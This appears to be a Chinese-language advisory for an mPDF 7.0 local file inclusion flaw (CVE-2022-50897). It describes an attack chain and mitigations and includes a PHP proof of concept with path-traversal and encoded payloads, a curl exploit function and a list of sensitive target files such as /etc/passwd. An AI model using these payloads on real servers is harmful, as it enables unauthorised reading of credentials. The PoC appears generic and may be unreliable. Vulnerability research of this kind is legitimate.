CVE-2022-50897 mPDF 7.0 本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2022-50897

漏洞类型

本地文件包含

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

mPDF 7.0

漏洞概述

CVE-2022-50897是mPDF 7.0版本中的一个本地文件包含（Local File Inclusion，LFI）漏洞。该漏洞允许低权限攻击者通过操纵注解（annotation）文件参数，读取服务器上的任意系统文件。mPDF是一个流行的PHP库，用于生成PDF文档，广泛应用于各种Web应用程序中。由于该漏洞不需要用户交互即可利用，且对系统机密性造成高影响，攻击者可以利用此漏洞获取敏感信息，如配置文件、密码凭据、环境变量等。漏洞的CVSS评分为5.5，属于中等严重程度。攻击者通过构造特定的注解内容，利用文件路径规范来触发本地文件包含，最终实现对目标系统的未授权文件访问。此漏洞影响使用mPDF 7.0生成PDF文档的Web应用程序，攻击者可以通过上传恶意构造的PDF或通过参数注入的方式触发漏洞。

技术细节

mPDF 7.0在处理注解（annotation）时存在本地文件包含漏洞。漏洞源于应用程序对用户输入的文件路径参数缺乏充分的验证和过滤。攻击者可以通过在注解内容中注入文件路径规范（如../或绝对路径），使应用程序包含并读取服务器上的任意文件。攻击流程如下：1）攻击者构造包含恶意文件路径的注解内容；2）使用URL编码或Base64编码对payload进行混淆以绕过基础过滤；3）将构造的数据作为注解文件参数提交到mPDF处理端点；4）服务器端解析注解时，执行文件包含操作；5）被包含文件的内容被返回给攻击者。典型的利用方式是在注解的file参数中指定系统文件路径，如/etc/passwd或应用程序配置文件。mPDF在处理注解时使用include或require语句加载指定文件，但未对路径进行安全校验，导致攻击者可以遍历目录读取敏感文件。该漏洞属于OWASP Top 10中的A03:2021 - Injection类别。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Web应用程序是否使用mPDF 7.0库来生成PDF文档。可以通过分析页面源码、观察PDF生成功能或使用指纹识别工具进行确认。

STEP 2

步骤2: 构造恶意payload

攻击者构造包含本地文件路径的注解参数，使用路径遍历技术（如../）或绝对路径指定目标文件。可选地对payload进行URL编码或Base64编码以绕过简单的过滤机制。

STEP 3

步骤3: 发送恶意请求

通过Web表单、API接口或URL参数将构造的payload提交到mPDF处理端点。请求中包含恶意的注解文件参数，触发文件包含操作。

STEP 4

步骤4: 文件读取与数据窃取

服务器端mPDF处理注解时，执行文件包含操作。被包含的文件内容被嵌入到生成的PDF文档中或直接返回给攻击者。攻击者获取敏感系统文件内容。

STEP 5

步骤5: 持久化利用

攻击者利用获取的敏感信息（如数据库凭据、API密钥、配置文件）进一步横向移动或提升权限，实现对系统的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// CVE-2022-50897 PoC - mPDF 7.0 Local File Inclusion
// Target: mPDF 7.0 annotation file parameter manipulation

// Method 1: Direct file path injection via annotation
$poc_payload_1 = array(
    'annotation' => array(
        'file' => '../../../../../../etc/passwd',
        'name' => 'malicious_file'
    )
);

// Method 2: URL-encoded payload
$poc_payload_2 = array(
    'annotation' => array(
        'file' => urlencode('../../../../../../etc/passwd'),
        'name' => urlencode('test.txt')
    )
);

// Method 3: Base64-encoded payload (if application accepts encoded input)
$target_file = '/etc/passwd';
$poc_payload_3 = array(
    'annotation' => array(
        'file' => base64_encode($target_file),
        'name' => 'encoded_file',
        'encoding' => 'base64'
    )
);

// Example exploit request simulation
function exploit_mpdf_lfi($target_url, $payload) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/json'
    ));
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

// Usage example
// $result = exploit_mpdf_lfi('http://target.com/generate_pdf', $poc_payload_1);
// echo $result;

// Common targets for file inclusion:
$target_files = array(
    '/etc/passwd',
    '/etc/hosts',
    '/var/www/html/config.php',
    '/etc/apache2/sites-enabled/000-default.conf',
    '/proc/self/environ',
    'C:\\Windows\\System32\\drivers\\etc\\hosts'
);
?>

影响范围

mPDF 7.0

防御指南

临时缓解措施

在官方修复发布之前，可采取以下临时缓解措施：1）限制mPDF处理用户提交的文件路径参数，添加严格的路径验证逻辑；2）使用chroot或容器隔离技术限制PHP进程的文件系统访问范围；3）配置Web应用防火墙（WAF）规则，检测和阻止路径遍历攻击；4）禁用不必要的PHP文件操作函数；5）对所有文件包含操作添加权限检查；6）实施日志监控，及时发现异常的文件访问行为。建议尽快升级到mPDF官方发布的安全版本以根本解决此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2022-50897
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2022-50897
3 Details https://www.cvedetails.com/cve/CVE-2022-50897/
4 VulDB https://vuldb.com/cve/CVE-2022-50897
5 Link https://mpdf.github.io/
6 Link https://www.exploit-db.com/exploits/50995
7 Link https://www.vulncheck.com/advisories/mpdf-local-file-inclusion